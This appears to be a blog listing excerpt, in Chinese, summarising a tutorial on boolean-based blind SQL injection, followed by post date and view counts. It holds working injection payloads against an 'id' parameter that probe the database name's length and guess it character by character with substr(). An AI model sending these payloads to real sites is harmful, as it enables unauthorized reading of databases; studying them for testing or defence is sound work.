摘要: 获取数据库名 长度 ?id=2' and length(database())=8 --+ 逐字猜解 ?id=2' and substr(database(),1,1)='s' --+ ?id=2' and substr(database(),2,1)='e' --+ 获取数据表 长度 ?id=2' 阅读全文
posted @ 2023-07-12 13:36 baiye1 阅读(27) 评论(0) 推荐(0)